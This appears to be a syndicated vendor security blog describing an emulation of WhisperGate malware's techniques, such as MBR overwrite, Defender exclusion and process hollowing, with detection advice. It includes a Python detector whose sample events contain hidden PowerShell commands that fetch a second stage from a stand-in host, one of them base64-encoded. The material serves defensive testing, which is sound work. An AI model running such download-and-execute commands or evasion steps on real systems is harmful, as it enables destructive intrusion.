
Emulating the Destructive WhisperGate Malware
Adversary Emulation
Published
November 12, 2024
AttackIQ has released a new attack graph that seeks to emulate the Tactics, Techniques and Procedures (TTPs) associated with the destructive WhisperGate malware.
WhisperGate is a type of destructive malware first identified in January 2022, primarily linked to cyberattacks targeting Ukraine. Initial analysis of this malware was published in the joint advisory AA22-057A on February 26, 2022, detailing its behavior and impact. More recently, further insights into the threat were provided in the Cybersecurity Advisory (CSA) AA24-249A, released on September 5, 2024, highlighting its continued relevance and the evolving nature of this threat.
WhisperGate mimics some behaviors of traditional ransomware, but it does not provide any decryption or recovery method to restore the files, proving its intent to cause irreversible damage rather than pursuing financial gain. Its deployment during attacks on Ukraine suggests it was part of a broader effort to disrupt critical infrastructure during heightened geopolitical tensions, marking it as a potent weapon for state-sponsored attacks aimed at destabilization.
On September 10, 2024, AttackIQ responded to the CSA AA24-249A with a new assessment template. Building on this, AttackIQ has now released additional content that expands on the behaviors exhibited by WhisperGate malware. This includes a new attack graph designed to help customers validate their security controls and assess their ability to defend against this threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against destructive threats.
- Assess their security posture against the Tactics, Techniques and Procedures (TTPs) exhibited by WhisperGate.
- Continuously validate detection and prevention pipelines on Windows environments.
WhisperGate – 2024-09 – Associated Tactics, Techniques, and Procedures (TTPs)
This attack graph is based on the Cybersecurity Advisory (CSA) released by Cybersecurity and Infrastructure Security Agency (CISA), alongside multiple partners, that outlines activities carried out by cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155), who have begun deploying the destructive WhisperGate malware.
This attack graph consists of a multi-stage approach with an initial set of malicious payloads that overwrites the Master Boot Record (MBR) and displays a fake ransom note. Then, WhisperGate retrieves additional payloads from Discord to perform further actions on the objective. It then adds a directory to the Windows Defender exclusion list to avoid detection and performs system discovery to collect information on physical disks and the file system.
Initial Access – Malware Delivery
This stage focuses on the deployment of two malicious payloads into the system. The first, BootPatch, overwrites the Master Boot Record (MBR) and displays a fake ransom note. The second, WhisperGate, retrieves an additional payload from a Discord server. Afterward, a Base64 encoded PowerShell command is executed, causing the system to sleep for 10 seconds to evade detection.
Ingress Tool Transfer (T1105): This technique is exercised in two separate scenarios, one that downloads the payload to memory and one that saves it to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious content.
Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.
Execution – Additional Payload Deployment
In this stage, additional payloads are deployed into the system. First, a reversed payload is downloaded. After reversing its bytes, the payload uses reflective loading to place a Dynamic-Link Library (DLL) directly into memory. Finally, a Visual Basic Script (VBS) file is dropped onto the system to execute further actions.
Reflective Code Loading (T1620): This scenario takes a default AttackIQ DLL and loads it into the memory space of its own process in order to execute the desired DLL function.
Discovery & Defense Evasion – Evade Windows Defender
In this stage, WhisperGate adds a directory path to the Windows Defender exclusion list. Then, a payload is loaded via process hollowing in the context of the InstallUtil process. Finally, a discovery routine is executed to gather information about the system’s physical disks and file system.
Impair Defenses: Disable or Modify Tools (T1562.001): This scenario uses the Add-MpPreference cmdlet to add the %TEMP%\aiq-temp-exclusion\ directory path to the Windows Defender exclusion list.
Process Injection: Process Hollowing (T1055.012): This scenario creates a process in a suspended state and unmaps its memory, which is then replaced with the contents of a malicious executable. This technique allows the malicious code to be executed while being masked as a legitimate process.
Peripheral Device Discovery (T1120): This scenario retrieves information about the system's physical disks using the GetLogicalDrives API call.
Peripheral Device Discovery (T1120): This scenario retrieves information about the system's physical disks using the GetDriveTypeW API call.
File and Directory Discovery (T1083): This scenario calls the FindFirstFileW and FindNextFileW Windows APIs to enumerate the file system.
Detection and Mitigation Opportunities
With so many different techniques being used by threat actors, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Process Injection: Process Hollowing (T1055):
Malware will commonly inject malicious code into legitimate suspended and hollowed processes to attempt to blend in with legitimate applications to remain hidden and appear normal to the compromised system.
1a. Detection
Searching for common processes that are performing uncommon actions can help identify when a process has been compromised.
1b. Mitigation
MITRE ATT&CK offers the following mitigation recommendations:
2. Ingress Tool Transfer (T1105):
Adversaries often rely heavily on downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.
2a. Detection
The following signatures can help identify when native utilities are being used to download malicious payloads.
PowerShell Example:
Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")
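The signature above, implemented in Python as an added example (not AttackIQ's code) and run over constructed process-creation events. It goes one step beyond the page's rule by decoding -EncodedCommand blobs before matching, because the stage described earlier runs base64-encoded PowerShell that a plain substring match on the raw command line would miss; hosts and script text are constructed placeholders.

```python
import base64
import re

# Process names the page's signature scopes to (compared case-insensitively).
TARGET_PROCESSES = {"cmd.exe", "powershell.exe"}

# -EncodedCommand and its common short forms, followed by a base64 blob.
# PowerShell decodes that blob as UTF-16LE text.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_commands(command_line: str) -> str:
    """Replace every -EncodedCommand blob with its decoded script text so the
    content match also covers encoded stages; undecodable blobs are left as-is."""
    def _sub(m):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
    return ENCODED_RE.sub(_sub, command_line)


def matches_signature(process_name: str, command_line: str) -> bool:
    """Process Name == (cmd.exe OR powershell.exe) AND Command Line CONTAINS
    ((IWR OR Invoke-WebRequest) AND DownloadData AND Hidden), evaluated on the
    command line after any encoded blobs have been decoded."""
    if process_name.lower() not in TARGET_PROCESSES:
        return False
    text = decode_encoded_commands(command_line).lower()
    downloader = "iwr" in text or "invoke-webrequest" in text
    return downloader and "downloaddata" in text and "hidden" in text


def scan_events(events):
    """Return the (process, command line) pairs that trigger the signature."""
    return [(p, c) for p, c in events if matches_signature(p, c)]


# Constructed sample events (placeholder hosts, not real telemetry).
STAGE2_SCRIPT = "(New-Object Net.WebClient).DownloadData((IWR http://placeholder.invalid/s2).Content)"
ENCODED_BLOB = base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ("powershell.exe", f'powershell.exe -w hidden -c "{STAGE2_SCRIPT}"'),  # plain-text stage
    ("powershell.exe", f"powershell.exe -w hidden -enc {ENCODED_BLOB}"),  # encoded stage
    ("powershell.exe", "powershell.exe Invoke-WebRequest https://placeholder.invalid/a.msi -OutFile a.msi"),
    ("cmd.exe", "cmd.exe /c dir C:\\Users"),
    ("explorer.exe", f'explorer.exe -w hidden "{STAGE2_SCRIPT}"'),  # outside the process scope
]

if __name__ == "__main__":
    for proc, cmd in scan_events(SAMPLE_EVENTS):
        print(f"ALERT {proc}: {cmd[:60]}...")
```

Only the first two sample events fire; the encoded one does so solely because the blob was decoded first.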
2b. Mitigation
MITRE ATT&CK has the following mitigation recommendations.
3. Reflective Code Loading (T1620):
Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating and then executing payloads directly within the memory of the process, rather than creating a thread or process backed by a file path on disk.
3a. Detection
Monitor for artifacts of abnormal process execution or code artifacts associated with reflectively loading code, such as the abuse of .NET functions like Assembly.Load() or Native API functions like CreateThread(), memfd_create(), execve(), and/or execveat().
3b. Mitigation
This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.
Wrap Up
In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against WhisperGate. With data generated from continuous testing and the use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and persistent threat.
AttackIQ offers a comprehensive Breach and Attack Simulation Platform to assist security teams. This includes AttackIQ Flex, a tailored pay-as-you-go service; AttackIQ Ready!, a fully managed service for continuous security optimization; and AttackIQ Enterprise, a co-managed service offering enhanced support. These services ensure your team maintains a robust security posture.
*** This is a Security Bloggers Network syndicated blog from AttackIQ authored by Ayelen Torello. Read the original post at: https://www.attackiq.com/2024/11/12/emulating-whispergate-malware/